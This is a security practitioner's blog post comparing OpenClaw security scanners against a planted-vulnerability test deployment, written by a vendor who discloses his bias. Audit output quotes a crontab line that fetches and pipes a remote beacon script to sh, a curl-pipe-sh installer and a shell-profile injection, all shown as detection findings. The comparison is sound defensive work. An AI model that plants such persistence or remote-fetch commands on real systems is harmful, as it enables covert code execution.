I Ran Every Free OpenClaw Security Tool. Here's What Each One Found.

There are now over a dozen tools that claim to check the security of your OpenClaw deployment. Some are built into OpenClaw itself. Some are open-source projects. Some are commercial products with free tiers. I set up a deliberately vulnerable test deployment, ran every tool I could find against it, and documented exactly what each one caught -- and what each one missed.

I'm Peter Kwidzinski -- Platform Security Architect with 20+ years in the industry. I built BulwarkAI's security scripts, so I have an obvious bias here. I've tried to be as fair as possible, and I'll call out where my own tools fall short alongside everyone else's. If you think I've gotten something wrong, tell me and I'll update this post.

The test deployment

To make this comparison meaningful, I created a standardized test environment with known vulnerabilities. This way I could measure exactly what each tool catches against a known ground truth.

The deployment:

• OpenClaw 0.4.0 (deliberately not the latest, to test version detection)
• 12 skills installed: 8 legitimate, 4 from the ClawHavoc IOC database (known malicious)
• 3 MCP servers configured: 2 legitimate, 1 simulating the MCP proxy campaign
• Identity file modified to include a hidden API proxy endpoint (simulating CVE-2026-26102 exploitation)
• Default permissions (no hardening applied)
• One skill with a crontab persistence mechanism
• One skill with shell profile injection (.zshrc modification)
• Skills installed in both the default directory and a custom OPENCLAW_SKILLS_DIR path

Total planted issues: 14 distinct security problems across 8 categories. Let's see what each tool found.

Tool 1: OpenClaw Built-In Security Audit

Command: openclaw security audit
Cost: Free (included with OpenClaw)
Type: CLI tool, runs locally
Time to run: ~5 seconds

$ openclaw security audit

OpenClaw Security Audit v0.4.0
================================

[WARN] OpenClaw version 0.4.0 is outdated (latest: 0.4.2)
[WARN] Gateway authentication not configured
[WARN] Default file permissions too broad: ~/.openclaw/skills/ is world-readable
[FAIL] 2 skills have network access without explicit allowlist
[WARN] MCP servers enabled but no authentication configured
[INFO] 12 skills installed in default directory

5 issues found (1 critical, 2 warnings, 2 info)

What it caught (5 of 14):

• Outdated OpenClaw version
• Missing gateway authentication
• Overly broad file permissions
• Skills with unrestricted network access
• MCP servers without authentication

What it missed (9 of 14):

• All 4 malicious skills (no IOC checking)
• The malicious MCP proxy server (checked config format, not server behavior)
• Modified identity file (no integrity checking)
• Crontab persistence mechanism
• Shell profile injection
• Skills in the custom directory (only checked the default path)

Verdict: The built-in audit is a necessary first step. It catches configuration issues and obvious misconfigurations. But it has no concept of malicious skills, no integrity monitoring, and no persistence detection. This is what I call the "60% baseline" -- it covers the easy stuff and misses the hard stuff. Run it, fix what it flags, then keep going with other tools.

Tool 2: SecureClaw

Command: secureclaw scan
Cost: Free, open-source (MIT license)
Type: CLI tool, runs locally
Time to run: ~12 seconds

$ secureclaw scan

SecureClaw v1.2.0 - OpenClaw Security Scanner
==============================================

Scanning skill directory: ~/.openclaw/skills/
Scanning 12 skills...

[HIGH] Skill 'openclw-gmail' matches known malicious pattern (typosquat)
[HIGH] Skill 'claw-slack-bot' matches known malicious pattern (typosquat)
[WARN] Skill 'data-pipeline-pro' has suspicious install script (curl | sh)
[HIGH] Outdated OpenClaw version: 0.4.0 (CVE-2026-25253, CVE-2026-26102 unpatched)
[WARN] 3 skills request filesystem write access outside their directory
[WARN] MCP server 'analytics-proxy' connects to unverified endpoint
[INFO] Gateway authentication not configured

7 issues found (3 high, 3 warnings, 1 info)

What it caught (7 of 14):

• 2 of 4 malicious skills (typosquat detection via name similarity matching)
• 1 suspicious install script (pattern matching for curl | sh)
• Outdated version with specific CVE references
• Overly broad write permissions
• Suspicious MCP server endpoint
• Missing gateway authentication

What it missed (7 of 14):

• 2 of 4 malicious skills (the ones that weren't typosquats -- they had original names but malicious payloads)
• Modified identity file
• Crontab persistence mechanism
• Shell profile injection
• Skills in the custom directory (same limitation as built-in audit)
• The MCP proxy attack (flagged the endpoint as "unverified" but didn't identify the proxy behavior)
• Default file permissions issue

Verdict: A meaningful improvement over the built-in audit. SecureClaw's typosquat detection is genuinely useful -- it caught two malicious skills that the built-in audit completely missed. The CVE-specific version checking is also helpful. But it still only scans the default skill directory, has no persistence detection, and its IOC database is smaller than BulwarkAI's. For a free, open-source tool, it's solid. For a deeper comparison, see our SecureClaw vs BulwarkAI analysis.

Tool 3: Aikido.dev OpenClaw Scanner

Access: Web-based scanner at aikido.dev
Cost: Free tier (limited scans per month), paid plans available
Type: Cloud-based, requires uploading config files or connecting your repository
Time to run: ~30 seconds (includes upload time)

Aikido OpenClaw Security Scan Results
======================================

Risk Score: 72/100 (High Risk)

CRITICAL:
- OpenClaw version 0.4.0 has 2 unpatched CVEs
  (CVE-2026-25253: Skill Sandbox Escape, CVSS 9.1)
  (CVE-2026-26102: Identity File Injection, CVSS 7.8)

HIGH:
- Skill 'openclw-gmail' flagged as malicious (ClawHavoc database match)
- Skill 'claw-slack-bot' flagged as malicious (ClawHavoc database match)
- Skill 'crypto-helper-2026' flagged as malicious (behavioral analysis)
- MCP server 'analytics-proxy' communicates with known C2 domain

MEDIUM:
- 3 skills have excessive filesystem permissions
- Identity file contains non-standard API endpoint configuration
- Gateway authentication not configured

LOW:
- 2 skills have unscoped network access

11 issues found

What it caught (9 of 14):

• 3 of 4 malicious skills (typosquat detection plus behavioral analysis)
• Outdated version with CVE details
• MCP proxy server identified via C2 domain matching
• Modified identity file (detected non-standard endpoint, though didn't identify it as CVE-2026-26102 exploitation specifically)
• Excessive filesystem permissions
• Missing gateway authentication
• Unscoped network access

What it missed (5 of 14):

• 1 of 4 malicious skills (the one with a clean manifest but malicious behavior at runtime)
• Crontab persistence mechanism
• Shell profile injection
• Skills in the custom directory
• Default file permissions on the skill directory itself

Verdict: The strongest showing of any tool in this test. Aikido's behavioral analysis caught a malicious skill that both the built-in audit and SecureClaw missed. Their C2 domain database is well-maintained and caught the MCP proxy campaign. The identity file anomaly detection is a nice touch. The main weaknesses are the same as everyone else: no persistence detection, no custom directory scanning, and the cloud-based model means you're sharing your config with a third party. The free tier limits are also restrictive -- you'll need a paid plan for regular scanning.

Tool 4: BulwarkAI Audit Scripts

Command: bash bulwarkai-audit.sh (from the Security Blueprint)
Cost: $97 (part of the Security Blueprint); free scanner available at bulwarkai.io for basic checks
Type: Local bash scripts + browser-based scanner
Time to run: ~8 seconds (local scripts), ~3 seconds (free scanner)

$ bash bulwarkai-audit.sh

BulwarkAI Security Audit v2.1
================================

[PHASE 1: Version & Config]
[CRIT] OpenClaw 0.4.0 - UNPATCHED: CVE-2026-25253, CVE-2026-25891, CVE-2026-26102
[HIGH] Gateway authentication disabled
[HIGH] Default file permissions: ~/.openclaw/skills/ is 755 (should be 700)

[PHASE 2: Skill Scanning - All Directories]
  Scanning: ~/.openclaw/skills/ (12 skills)
  Scanning: ~/projects/custom-skills/ (3 skills)
[CRIT] openclw-gmail - IOC MATCH (ClawHavoc #CH-0147, typosquat)
[CRIT] claw-slack-bot - IOC MATCH (ClawHavoc #CH-0291, typosquat)
[CRIT] crypto-helper-2026 - IOC MATCH (ClawHavoc #CH-0834, cryptominer)
[HIGH] data-pipeline-pro - SUSPICIOUS: install script contains curl | sh
[WARN] project-automator has network access without allowlist

[PHASE 3: Identity & Config Integrity]
[CRIT] identity.json MODIFIED - contains non-standard API proxy endpoint
       Expected hash: a3f8c2...  Current hash: 7b1d9e...
       DIFF: Added "proxy_endpoint": "https://api-mirror.clawtools[.]net/v1"

[PHASE 4: MCP Server Audit]
[CRIT] MCP server 'analytics-proxy' endpoint resolves to known C2 IP
[HIGH] MCP server 'analytics-proxy' registered by skill 'data-pipeline-pro'
[WARN] MCP server authentication uses empty-header bypass (CVE-2026-25891)

[PHASE 5: Persistence Detection]
[HIGH] Crontab entry found: */15 * * * * curl -s https://clawtools[.]net/beacon | sh
       Likely installed by: crypto-helper-2026
[HIGH] Shell profile modified: ~/.zshrc contains appended code block
       Line 47-52: sources script from /tmp/.openclaw-helper.sh
       Likely installed by: data-pipeline-pro

[PHASE 6: Network Analysis]
[WARN] 3 skills have network access without explicit allowlist
[INFO] Outbound connections observed to 2 unexpected domains

13 issues found (5 critical, 4 high, 3 warnings, 1 info)
Full report: ./bulwarkai-audit-report-2026-03-03.json

What it caught (13 of 14):

• 3 of 4 malicious skills (IOC database match + suspicious pattern detection)
• Outdated version with all three CVE references
• Modified identity file with specific diff showing the injected proxy endpoint
• MCP proxy server identified via C2 IP resolution and skill correlation
• Crontab persistence mechanism with attribution to the installing skill
• Shell profile injection with line-level detail
• Skills in the custom directory (multi-directory scanning)
• Gateway authentication, file permissions, network access issues

What it missed (1 of 14):

• 1 of 4 malicious skills (same one Aikido missed -- clean manifest, no IOC match, malicious only at runtime). This skill would require dynamic analysis or runtime monitoring to catch, which no current tool does.

Verdict: Full disclosure -- I built this, so take my assessment with appropriate skepticism. The multi-directory scanning, persistence detection, and identity file integrity checking are capabilities that no other tool in this comparison offers. The IOC database is the largest at 1,184+ entries. The main limitation is the same as everyone else's: it can't catch skills that are only malicious at runtime. The other limitation is cost -- the full scripts require the Security Blueprint purchase, though the free scanner at bulwarkai.io covers the basics.

Tool 5: VirusTotal / Manual Upload

Access: Upload files at virustotal.com
Cost: Free
Type: Cloud-based, file-by-file analysis
Time to run: ~60 seconds per file (manual upload process)

VirusTotal isn't an OpenClaw-specific tool, but several people have recommended it for checking skill files. I tested it by uploading each of the 4 malicious skill packages.

VirusTotal Results (per-file upload):

openclw-gmail.zip:        2/72 engines flagged (Generic.Trojan.Agent, Malware.Generic)
claw-slack-bot.zip:       0/72 engines flagged
crypto-helper-2026.zip:   8/72 engines flagged (Coinminer, PUA.CryptoMiner)
data-pipeline-pro.zip:    1/72 engines flagged (Suspicious.Script.Download)

What it caught (2 of 14):

• The cryptominer skill (multiple engines recognized XMRig components)
• Partial detection of the typosquat skill (low confidence, 2 engines)

What it missed (12 of 14):

• 2 of 4 malicious skills entirely (the typosquats looked like legitimate code to traditional AV)
• All configuration and deployment-level issues (VirusTotal analyzes files, not deployments)
• MCP proxy, identity file modification, persistence, permissions -- none of these are in scope

Verdict: VirusTotal is not the right tool for this job. It's designed for traditional malware analysis, and most OpenClaw threats don't look like traditional malware. A malicious skill is often perfectly legitimate code that does something the user didn't authorize -- that's a context problem, not a signature problem. VirusTotal is useful if you suspect a skill packages a known malware binary (like the XMRig cryptominer), but it won't catch the majority of OpenClaw-specific threats. Don't rely on it as your primary tool.

The overlap matrix

Here's the complete picture -- every planted issue and which tools caught it.

Legend: ✓ = caught, ✗ = missed, ~ = partial detection (flagged but didn't fully identify the issue)

What you should actually run

Based on this testing, here's my recommendation for what to run and in what order. This isn't "pick one" -- it's "run them in layers."

Layer 1: The baseline (free, everyone should do this)

1. Run openclaw security audit. Fix everything it flags. Takes 5 minutes. No excuse not to do this.
2. Run SecureClaw. Free, open-source, catches things the built-in audit misses. Especially useful for typosquat detection. Takes 2 minutes to install and run.
3. Run the free BulwarkAI scanner. Browser-based, no account needed. Checks your skills against the IOC database. Takes 30 seconds.

This three-layer free stack gets you to about 7-8 of 14 issues caught. Better than any single free tool alone.

Layer 2: Deeper scanning (free tier or paid)

4. Run Aikido's scanner. The behavioral analysis and C2 domain matching add value beyond what the free tools catch. The free tier gives you limited scans per month -- use them for initial assessment and after any significant changes.

This gets you to about 9-10 of 14 issues caught.

Layer 3: Full coverage (paid)

5. Run BulwarkAI's audit scripts. The multi-directory scanning, persistence detection, identity integrity monitoring, and MCP deep audit cover the gaps that all free tools miss. This gets you to 13 of 14. The only thing no tool catches is runtime-only malicious behavior.

Layer 4: What no tool catches (manual)

The 14th issue -- the skill that's clean on disk but malicious at runtime -- requires either:

• Runtime monitoring: Watching what the skill actually does when it executes. No current tool offers this for OpenClaw, though I expect it's coming.
• Network monitoring: Capturing outbound traffic from your OpenClaw process and reviewing it for unexpected destinations. You can do this manually with:

# Monitor OpenClaw network connections in real-time
# macOS:
sudo lsof -i -P | grep openclaw

# Linux:
ss -tnp | grep openclaw

# Or capture DNS queries:
sudo tcpdump -i any port 53 | grep openclaw

This is the gap that the entire ecosystem needs to close. Until we have runtime behavioral analysis for OpenClaw skills, there will always be threats that static analysis can't catch.

A note on fairness

I want to be transparent about a few things:

I built BulwarkAI. I have a financial incentive for it to look good in this comparison. I've tried to be fair by using a standardized test with planted issues and documenting exactly what each tool caught. The results are reproducible -- I'm happy to share the test deployment configuration with anyone who wants to verify.

These tools serve different audiences. The built-in audit is for everyone. SecureClaw is for technically comfortable users who want more coverage for free. Aikido is for teams that want SaaS-style scanning with minimal setup. BulwarkAI is for people who want the deepest local analysis with the largest IOC database. VirusTotal is for checking individual suspicious files, not for deployment-level scanning.

All of these tools are improving rapidly. OpenClaw security is a month old. By the time you read this, some of these tools may have added capabilities they didn't have during my test. SecureClaw in particular is actively developed and adding features weekly. I'll update this comparison periodically.

No tool catches everything. My own tool missed 1 of 14 issues. The runtime-only malicious skill is a genuine blind spot for the entire ecosystem. If someone tells you their tool catches everything, they're either lying or they haven't tested against this class of threat.

The best defense is layered. Run multiple tools. Don't rely on any single one. The free three-layer stack (built-in + SecureClaw + BulwarkAI free scanner) catches more than any single paid tool. Layering in Aikido and the full BulwarkAI scripts gets you close to complete coverage.